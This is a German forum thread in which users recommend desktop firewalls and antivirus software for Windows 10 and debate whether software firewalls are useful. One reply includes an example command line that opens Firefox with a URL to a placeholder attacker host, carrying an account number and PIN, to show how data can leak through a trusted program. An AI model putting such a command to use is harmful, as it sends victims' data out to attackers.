Firewall für Windows gesucht (Desktop-Firewall)

F.L.X

Neu angemeldet
Registriert
25 März 2014
Beiträge
138
Grüß Euch,

für einen Studienkollegen möchte ich fragen,
der eine Desktop-Firewall sucht, weil er mit einem Surfstick (= ohne Router) "unterwegs" ist.

Kann da wer was empfehlen? ( Gdata, Comodo; PcFirewall, sygate, outpost )
• evtl. m. oder separatem Antivirus
• evtl. sogar kostenlos

für
• Windows 10
 
Sehr altes Internetthema, Windows bringt nachwievor auch eine eigene Firewall mitsich, die reicht, Antivir steht auf einem anderen Blatt
 
Bin momentan mit der TinyWall auf Win10 unterwegs. Ist zwar keine eigene Firewall da sie nur die Windows Firewall verwaltet, erweitert diese jedoch sodass Windows-Dienste und Prozesse ebenfalls blockiert werden. Freigaben gehen über explizites Whitelistening auf Datei oder Prozessebene. Von den im deutschsprachigen Bereich vertretenen Antivirenprogrammen kann man meines Erachtens nehmen was man persönlich lieber hat. Egal ob Avira, Avast, Kaspersky, bei einem namhaften Anbieter sollte man schon bleiben. Die primäre Schutzfunktionen sind sowieso ein AdBlocker (µBlock, AdBlock+, ...) und bei Bedarf ein Scriptblocker (NoScript, µMatrix, ...).
 
Wozu eine Firewall? Was genau ist das Problem?
Windows hat eine integrierte, sehr gute Firewall.
Softwarefirewalls auf einem kritischen System können für ausgehende Daten umgangen werden. Dazu gibt es reichlich Wege, dass ein Programm, welches Daten nach außen tragen will, aber keine Ports öffnen darf, andere legitimierte Anwendungen dazu missbraucht.
Eingehende Angriffe sollten bei mobilem Internet kein Problem darstellen. In der Regel sitzt man da sowieso hinter NAT und Proxy. In so fern können sowieso keine Ports nach außen ins Internet freigegeben sein.


Über Antivirenprogramme lässt sich streiten, ich halte nichts davon.
 
  • Thread Starter Thread Starter
  • #9
Danke Euch, für Eure Ratschläge,

v.a. auch die integrierte zu nutzen.

sicherlich ist es das einfachste und klar, der Aspekt war mir auch vorher schon bewußt:
Windows bremmst sich selbst sicherlich nicht so aus, wie andere Firewall-Programme anderer Produkte, die sich immer zwischen Browser/FTP und Netzwerkkarte klemmen müssen.

dennoch ist es irgendwie besonders bei mir, auch wenn ich dem Betriebbssystem-Hersteller bedingungs-los (:D) vertraue und alles legal erworben habe, ein Ur-Wunsch, selbst den von ihm freigegebenen (oder gerade zu ihm fließenden :P ) Traffic mit einem anderen, unabhängigeren Programm kontrollieren zu können.
Ich glaube, dem Wunsch kann sich niemand entziehen ... Nicht einmal .. Linuxnutzer :D

wenn auch die Vertrauensfrage auch wieder nur ausgelagert wird ...
und technisch neue Bremsen aufgebaut werden....
achja

von daher war meine Hoffnung, daß vielleicht noch jemand was kennt, was man guten Gewissens empfehlen (und auch dann sogar selber einsetzen kann) kann.

soviel zu Firewalls ...

zu AV: Früher galt ja die Regel, nur 1 AV Scanner einzusetzen, da die sich beide ausbremsen oder sogar auch gegenseitig behindern könnten, indem sie sich gegenseitig die Signaturdatenbanken in die Quarantäne schieben könnten :D
 
Eine Firewall hat nichts mit einem AV Scanner zu tun. Es sind zwei grundlegend unterschiedliche Dinge.
Eines überwacht Programme/ Prozesse auf deinem System, das andere überwacht I/O im Netzwerk.

Virenscanner arbeiten nicht nur mit Signaturdatenbanken. Würden sie sich rein auf Datenbanken stützen, wären 2 oder mehr Scanner wahrscheinlich kein wirkliches Problem. Problematisch wird erst wenn Heuristiken/ Verhaltensanalyse zur Gefahrenerkennung genutzt werden.

Unabhängig davon habe ich ja schon erwähnt, dass eine Desktopfirewall keinen tatsächlichen Nutzen mit sich bringt. Wie gesagt, ein Programm, das nicht mit dem Web kommunizieren kann, kann immer auch ein legitimiertes Programm missbrauchen um darüber Informationen nach außen zu schieben.
Bestes Beispiel ist dein Browser

[src=bash]C:\Program Files (x86)\Mozilla\Firefox\firefox.exe http://boese-seite.hacker/?kontonummer=123456789&pin=12568&tel=+491234-456789[/src]
 
Eine Firewall ist immer nur so sicher wie, das dazugehörige Ruleset, eine Firewall alleine nicht konfiguriert bringt gar nichts, außer das sie den User falscher Sicherheit wiegt!


Ich bin mehr als nur zufrieden mit Outpost Firewall Pro und habe auch ein entsprechendes Ruleset. Virenschutz kommt von Eset (Endpoint Antivirus) und auch damit bin ich mehr als nur zufrieden. Auch dort habe ich entsprechende Regeln konfiguriert.

Mit dieser Kombination kann ich gut Leben und habe dadurch mehr als nur eine 0815 Security.
 
Zurück
Oben